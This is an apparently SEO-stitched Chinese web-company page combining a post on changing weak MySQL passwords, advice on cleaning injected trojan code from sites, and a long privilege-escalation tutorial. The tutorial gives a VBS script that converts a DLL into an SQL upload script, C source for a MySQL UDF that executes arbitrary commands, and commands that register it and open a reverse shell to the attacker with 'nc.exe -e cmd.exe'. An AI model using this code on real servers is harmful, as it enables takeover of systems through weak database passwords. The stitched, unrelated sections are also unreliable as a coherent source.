成都网站建设设计

将想法与焦点和您一起共享

mysql弱口令怎么修改,mysql弱口令是什么意思

如何更改MYSQL登入密码方法,修改phpMYadmin登入密码求解

刚才看到别人入侵服务器的一个视频以前只知道3306端口可以入侵,具体方法没搞懂今天是看明白了 弱口令当我想通的时候 吓的一身冷汗 我新配置的服务器MYSQL密码和美橙的一样那边SQL密码默认的都是弱口令 当时在转移数据的时候贪图一时方便 所以也用了相同的密码赶紧改..进到PHPMYADMIN改了room的新密码 重新登入发现新密码没生效 而默认的PHP网站打不开了我想是因为登入密码和数据库密码不一样吧网上找了一下怎么改mysql的登入密码 都他妈的在开玩笑似的严重鄙视下百度的搜索结果

创新互联是一家专注于成都网站制作、网站设计、外贸网站建设与策划设计,建华网站建设哪家好?创新互联做网站,专注于网站建设10余年,网设计领域的专业建站公司;建站业务涵盖:建华等地区。建华做网站价格咨询:18980820575

Google找了下,方法如下开始-程序-MYSQL-MYSQL SERVER5.0-MySQL Command Line Client是一个类似于CMD的东东 命令行提示输入密码,密码正确后显示在mysql后输入如下代码(*替换为你的新密码)

我的电脑360报mysql漏洞被攻击怎么办

一般都是网站程序存在漏洞或者服务器存在漏洞而被攻击了

网站挂马是每个网站最头痛的问题,解决办法:1.在程序中很容易找到挂马的代码,直接删除,或则将你没有传服务器的源程序覆盖一次但反反复复被挂就得深入解决掉此问题了。但这不是最好的解决办法。最好的方法还是找专业做安全的来帮你解决掉

听朋友说 SineSafe 不错 你可以去看看。

清马+修补漏洞=彻底解决

所谓的挂马,就是黑客通过各种手段,包括SQL注入,网站敏感文件扫描,服务器漏洞,网站程序0day, 等各种方法获得网站管理员账号,然后登陆网站后台,通过数据库 备份/恢复 或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容,向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP,然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时,你就会自动的访问被转向的地址或者下载木马病毒

清马

1、找挂马的标签,比如有script language="javascript" src="网马地址"/script或iframe width=420 height=330 frameborder=0

scrolling=auto src=网马地址/iframe,或者是你用360或病杀毒软件拦截了网马网址。SQL数据库被挂马,一般是JS挂马。

2、找到了恶意代码后,接下来就是清马,如果是网页被挂马,可以用手动清,也可以用批量清,网页清马比较简单,这里就不详细讲,现在着重讲一下SQL数据库清马,用这一句语句“update 表名 set 字段名=replace(字段名,'aaa','')”, 解释一下这一句子的意思:把字段名里的内容包含aaa的替换成空,这样子就可以一个表一个表的批量删除网马。

在你的网站程序或数据库没有备份情况下,可以实行以上两步骤进行清马,如果你的网站程序有备份的话,直接覆盖原来的文件即可。

修补漏洞(修补网站漏洞也就是做一下网站安全。)

1、修改网站后台的用户名和密码及后台的默认路径。

2、更改数据库名,如果是ACCESS数据库,那文件的扩展名最好不要用mdb,改成ASP的,文件名也可以多几个特殊符号。

3、接着检查一下网站有没有注入漏洞或跨站漏洞,如果有的话就相当打上防注入或防跨站补丁。

4、检查一下网站的上传文件,常见了有欺骗上传漏洞,就对相应的代码进行过滤。

5、尽可能不要暴露网站的后台地址,以免被社会工程学猜解出管理用户和密码。

6、写入一些防挂马代码,让框架代码等挂马无效。

7、禁用FSO权限也是一种比较绝的方法。

8、修改网站部分文件夹的读写权限。

9、如果你是自己的服务器,那就不仅要对你的网站程序做一下安全了,而且要对你的服务器做一下安全也是很有必要了!

网站被挂马是普遍存在现象然而也是每一个网站运营者的心腹之患。

您是否因为网站和服务器天天被入侵挂马等问题也曾有过想放弃的想法呢,您否也因为不太了解网站技术的问题而耽误了网站的运营,您是否也因为精心运营的网站反反复复被一些无聊的黑客入侵挂马感到徬彷且很无耐。有条件建议找专业做网站安全的sine安全来做安全维护。

如何利用弱口令入侵MySQL数据库

很早网上就有了用mysql弱口令得到webshell教程,但是这次我要说的不是得到webshell,而是直接得到系统权限,看清楚了,是“直接”得到!

首先,我简单说一下mysql弱口令得到系统权限得过程:首先利用mysql脚本上传udf dll文件,然后利用注册UDF

DLL中自写的Function函数,而执行任意命令。

思路很简单,网上也有一些教程,但是他们要么没有给具体的代码,要么一句话代过,搞得象我似得小菜很难理解,终于在我付出了几天得不断测试得辛勤劳动后,有了点结果,我把详细过程和相关代码得交给大家,这样大家就可以自己写dll文件,自己生成不同文件得二进制码啦!

下面,我们先说如何生成二进制文件得上传脚本。看看这段mysql脚本代码(网友Mix用的方法):

set @a =

concat('',0x0123abc1312389…..);

set @a = concat(@a,0x4658978abc545e……);

………………….

create table Mix(data LONGBLOB);//建表Mix,字段为data,类型为longblob

insert into Mix values("");update Mix set data = @a;//@a插入表Mix

select

data from Mix into DUMPFILE 'C:\\Winnt\\文件名';//导出表中内容为文件

前两句很熟悉把,这个就是我们以前注入的时候,绕过’的解决办法,把代码的16进制数声明给一个变量,然后导入这个变量就行了。只不过这里,因为16进制代码是一个文件的内容,代码太长了,所以就用了concat函数不断把上次得代码类加起来,这样不断累计到一个变量a中。后面几句就很简单了,我都有注释。

后面三句好说,但是前面的那么多16进制数据,手工的话,累人啊!不过你还记得以前有一个exe2bat.vbs脚本吗?这次我们可以把这个脚本修改一下后,得到我们这里需要得mysql脚本!对比exe2bat.vbs生成得文件和我们需要脚本的文件格式,我们可以轻松的得到我们所需的脚本。脚本内容如下:

fp=wscript.arguments(0

fn=right(fp,len(fp)-instrrev(fp,"\"))

with

createobject("adodb.stream")

.type=1:.open:.loadfromfile

fp:str=.read:sl=lenb(str)

end with

sll=sl mod 65536:slh=sl\65536

with

createobject("scripting.filesystemobject").opentextfile(fp".txt",2,true)

.write "set @a = concat('',0x"

for i=1 to sl

bt=ascb(midb(str,i,1))

if bt16 then .write "0"

.write hex(bt)

if i mod 128=0 then

.write ");" vbcrlf "set @a = concat(@a,0x"

next

end with

好了,现在只要你把所要上传的文件拖到这个脚本图标上面,就可以生成一个同名的txt文件了。这个txt文件,就是我们所需要的mysql脚本,当然我们还需要修改一下这个txt文件(毕竟他是我们偷工减料得来的!),把最后一行生成的多余的那句“set

@a = concat('',0x”删除了,加上建表,插值得那三句代码即可!

脚本生成了,如何上传?先登陆mysql服务器:

C:\mysql –u root –h hostip –p

Mysqluse mysql;

//先进入mysql默认得数据库,否则你下一步的表将不知道属于哪个库

Mysql\. E:\*.dll.txt;

//这儿就是你生成的mysql脚本

按照上面输入命令,就可以看见屏幕文字飞快闪烁(当然网速要快啦),不一会你的文件旧上传完毕了!

下面到达我们的重点,我们上传什么dll文件?就目前我再网上看到的有两个已经写好的dll文件,一个是Mix写得mix.dll,一个是envymask写得my_udf.dll,这两个我都用过,都很不错,但是都也有点不足。先来看看具体的使用过程吧!

先用mix.dll:

登陆mysql,输入命令:

Mysql \. e:\mix.dll.txt;

Mysql

CREATE FUNCTION Mixconnect RETURNS STRING SONAME 'C:\\windows\\mix.dll';

//这儿的注册的Mixconnect就是在我们dll文件中实现的函数,我们将要用他执行系统命令!

Mysql select

Mixconnect('你的ip','8080'); //填写你的反弹ip和端口

过一会儿,你监听8080端口的nc,就会得到一个系统权限的shell了!如图1:

这个的确不错,通过反弹得到得shell可以传过一些防火墙,可惜的是,它的这个函数没有写得很好,只能执行一次,当你第二次连接数据库后,再次运行“select

Mixconnect('你的ip','8080');”的时候,对方的mysql会当掉!报错,然后服务停止!

所以,使用mix.dll你只有一次成功,没有再来一次的机会!另外根据我的测试,他对Win2003的系统好像不起作用。

再用my_udf.dll:

Mysql\. C:\my_udf.dll.txt

Mysql CREATE FUNCTION my_udfdoor

RETURNS STRING SONAME 'C:\\winnt\\my_udf.dll';

//同样地,my_udfdoor也是我们注册后,用来执行系统命令得函数

Mysql select my_udfdoor('’);

//这儿可以随便写my_udfdoor得参数,相当于我们只是要激活这个函数

好了,现在你可以不用关这个shell了,我们再开一个cmd,使用:

D:\nc hostip 3306

*

4.0.*-nt x$Eo~MCG f**k //看到这个后,输入“f**k”

,他是my_udfdoor默认密码,自己无法更改

过一会儿,你就有了系统权限的shell了,

由于他是hook

recv版,所以穿墙的能力很强,我是在上一个mix.dll反弹失败的情况下,才使用这个得,他果然不负所望!进系统后,发现它有双网卡,天网防火墙个人版V2.73,对外仅仅开放3306端口,由此可见,my_udf.dll确实有很强的穿透防火墙得能力!但是他也有一个bug,就是再我们连接激活这个函数后(就是使用了命令“select

my_udfdoor('’);”后),不管你是否连接,只要执行了:

Mysqldrop function my_udfdoor;

后,mysql也汇报错,然后挂掉,

所以,你使用这个dll文件无法删除你的痕迹!

最后,然我们自己写一个自定义的dll文件。看能不能解决问题。

我们仅仅使用mysql 得udf的示例作模版即可!看他的示例:

#include stdlib.h

#include winsock.h

#include

mysql.h

extern "C" {

char *my_name(UDF_INIT *initid, UDF_ARGS

*args, char *is_null,

char *error);

// 兼容C

}

char

*my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null,

char *error)

{

char * me = "my name";

return me;

// 调用此UDF将返回 my name

}

十分简单吧?好,我们只需要稍微改一下就可以有了自己的dll文件了:

下面是我的一个哥们Crackme是修改的:

#include

stdlib.h

#include windows.h

#include "mysql.h"

extern "C" __declspec(dllexport)char *sys_name(UDF_INIT *initid, UDF_ARGS

*args, char *is_null, char *error);// sys_name就是函数名,你可以任意修改

__declspec(dllexport) char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char

*is_null, char *error) //当然这儿的sys_name也得改!

{

char me[256] = {0};

if

(args-arg_count == 1){

strncpy(me,args-args[0],args-lengths[0]);

me[args-lengths[0]]='\0';

WinExec(me,SW_HIDE); //就是用它来执行任意命令

}else

strcpy(me,"do nonthing.\n");

return me;

}

好,我们编译成sysudf.dll文件就可以了!我们来用他实验一把!

看操作:

Mysql\.

C:\sysudf.dll.txt

MysqlCreate function sys_name returns string soname

'C:\\windows\\sysudf.dll';

Mysql\. Nc.exe.txt //把nc.exe也上传上去

Mysqlselect sys_name('nc.exe -e cmd.exe 我的ip 8080');

//sys_name参数只有一个,参数指定要执行的系统命令

好,看看在Win2003中的一个反弹shell了,

当然,我们你也可以不反弹shell了,而去执行其他命令,只不过不论是否执行成功,都没有回显,所以要保证命令格式正确。对于这个dll文件,经过测试,不论何时“drop

function

sys_name;”,都是不会报错的,同时也可以多次运行不同命令。至于他的缺点,就是他的穿墙能力跟Mix.dll一样不算太强,但对于实在穿不透的墙,直接运行其他命令就是最好的选择了。

上面三个dll文件可谓各有所短,如何选择,就看你遇到的实际情况了。

好了,从脚本得编写使用到dll文件编写使用,说了这么多,现在大家应该都会了吧?题目说的是弱口令得到系统权限,但是如果你在注入等其他过程中,爆出了config.php中的mysql密码,不也是可以使用的吗?这样我们岂不是也找到继Serv-u后又一大提权方法了吗?


网站栏目:mysql弱口令怎么修改,mysql弱口令是什么意思
URL网址:http://chengdu.cdxwcx.cn/article/hccgsc.html